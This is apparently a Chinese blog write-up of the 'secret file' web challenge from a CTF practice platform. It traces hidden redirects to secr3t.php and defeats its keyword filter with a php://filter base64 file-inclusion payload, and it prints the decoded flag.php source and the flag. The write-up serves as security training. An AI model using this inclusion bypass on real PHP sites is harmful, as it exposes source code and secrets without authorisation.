| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> [极客大挑战]secret file -> 正文阅读 |
|
[PHP知识库][极客大挑战]secret file |
????????2.页面上看没有可以输入的地方,于是尝试看一下网页源代码,发现有一个可跳转的网址:Archive_room.php ????????3.跳转后出现如下页面,有一个secret选项,点击一下发现没有任何可用信息,查看源代码也没有发现。? ? ????????4.返回上一个页面看一下源代码,发现还有一个可跳转网址 ? ????????5.可以看到跳转的网页应该是action.php,但是点开后发现访问的是end.php。 ? ? ????????6.抓包查看一下跳转过程 ? ? ? ? ? ?7.发现由action.php到end.php中间还有一个过程,点开看一下发现还有隐藏跳转 ????????8.进入这个网页发现是一串代码? 可以看到只要输入”../”、”tp”、”input”、”data”都会返回Oh no!,所以这些关键字被过滤掉了。 比如下面这种输入会显示Oh no! http://355ecb6c-7fc7-4324-a22b-f8dde1fb5b75.node4.buuoj.cn:81/secr3t.php?file=php://input ? 直接进入看不到什么 ? ????????9.所以如果想要看到这个文件中的内容,需要通过伪协议进行绕过 令参数为: php://filter/convert.base64-encode/resource=flag.php 这样就可以得到flag.php文件源码base64编码后的字符串了。 ? 得到如下base64位编码: PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7NGE4YmUyZTYtNzkyNy00YmYwLTg1YTktM2I5MDIzMDEwY2VifSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo= ? ????????10.解码后得到一串代码 <!DOCTYPE html> <html> ????<head> ????????<meta charset="utf-8"> ????????<title>FLAG</title> ????</head> ????<body style="background-color:black;"><br><br><br><br><br><br> ???????? ????????<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br> ???????? ????????<p style="font-family:arial;color:red;font-size:20px;text-align:center;"> ????????????<?php ????????????????echo "我就在这里"; ????????????????$flag = 'flag{4a8be2e6-7927-4bf0-85a9-3b9023010ceb}'; ????????????????$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd' ?????????????> ????????</p> ????</body> </html> 11、得到flag flag{4a8be2e6-7927-4bf0-85a9-3b9023010ceb} |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 | -2024/12/27 5:12:59- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |
数据统计 |